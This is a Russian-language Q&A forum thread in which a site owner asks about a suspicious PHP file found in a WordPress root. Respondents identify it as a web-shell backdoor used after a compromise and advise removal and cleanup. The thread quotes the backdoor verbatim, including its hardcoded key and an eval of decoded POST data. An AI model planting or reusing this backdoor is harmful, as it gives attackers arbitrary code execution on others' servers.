Что делает этот код?

Question

[Валентин]

<?php  if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="erYj7#ZRu*q1ENPO2sdfsdf5CB6yhLdnUlGxM")eval(gzuncompress(base64_decode($_POST["chk"]))); ?>

Answer 1

[Алексей Ярков]

Если существует переменная q и она равна 1, то написать 200 и выйти. (Если существует переменная key и Если существует переменная chk) и если переменная key равна "erYj7#ZRu*q1ENPO2sdfsdf5CB6yhLdnUlGxM", то разжать, сжатую в base64, переменную chk

Comments

[Валентин]

это может быть закладкой?

[Алексей Ярков]

Валентин: это вам решать )) Я ХЗ. Этим не занимаюсь и в данном коде из подозрительного только eval вижу ))

[Валентин]

Алексей Ярков: там рядом пару dat файлов, вот вычитал eval() вычисляет строку, заданную в code_str , как код PHP, может оно так спам слать?

[Алексей Ярков]

Валентин: eval может все что угодно. Откуда у вас этот код?

[Валентин]

Алексей Ярков: да вот в корне каталога wordpress нашел, и называется странно timer.php хостер жаловался на спам рассылку, выключили почтовый ящик на хосте для обхода проблемы помогло, если файл добавлен не хостом для каких то своих нужд, то очень подозрительно, надо узнать и на чистой установке сверить наверное

[Валентин]

Max Kostinevich: а как получить этот $_POST["chk"] и проверить?

[Алексей Ярков]

Валентин:

а как получить этот $_POST["chk"] и проверить?

Вам логгировать надо или просто для интереса?

[Валентин]

Алексей Ярков: для спокойного сна)

[Алексей Ярков]

Валентин: для спокойного сна удалите его да и все ))

[Алексей Ярков]

Max Kostinevich: +1

[Валентин]

если переустановить wordpress затрутся или нет эти скрипты?

[Валентин]

Валентин: имею ввиду без сброса контента

[Алексей Ярков]

Валентин: простите, но вы тормоза винды тоже переустановкой лечите?

[Валентин]

Алексей Ярков: если на излечение тормозов времени уйдет на порядок больше, то проще переустановить, но я скорее откачусь из бэкапа. Так да или нет?

[Валентин]

Алексей Ярков: много подозрительного сканер показал, но там надо детально копаться, не факт что все вредоносно, при перестановке или обновлении cms контент не стирается

[Алексей Ярков]

Валентин: chk

если переустановить wordpress затрутся или нет эти скрипты?

Скорее всего. Зависит от способа установки. У меня на VPS без моего ведома не затрутся. У вас - ХЗ. Но рекомендую искать источник заражения, а не симптомы.

[Валентин]

Алексей Ярков: начальству другого програмиста нанимало давал пароли, работать он не стал, утекли видимо, по времени совпало, как репорт о спаме был поменял, не 100% но возможно

[Stalker_RED]

Валентин: В вашем случае eval() запускает код, который кто-то присылает на ваш сайт. Этот код может делать что угодно - удалять ваши файлы, воровать или модифицировать данные из базы, и, в том числе, отсылать спам. Удалите эту штуку или поставьте на мониторинг. И проверьте, нет ли других закладок кроме этой.

[Валентин]

Stalker_RED: понаходил сканером дешифровал, редкая бяка, отдельный слой авторизации, их несколько

Answer 2

[Евгений Д.]

Подобные куски кода обычно появляются в коде взломанных или завирусованных сайтов.
Его суть в том, что он позволяет выполнить произвольный код на сервере. Это искуственно созданная уязвимость

Answer 3

[VisualIdeas]

Вас взломали)
Пройдитесь по сайту https://revisium.com/ai/ этой штукой.
Меняйте все пароли/явки/хостера

А этот код ждет когда ему передадут программу и выполняет её.

Comments

[Валентин]

Поменял сразу,как спам пошёл, а это вот только заметил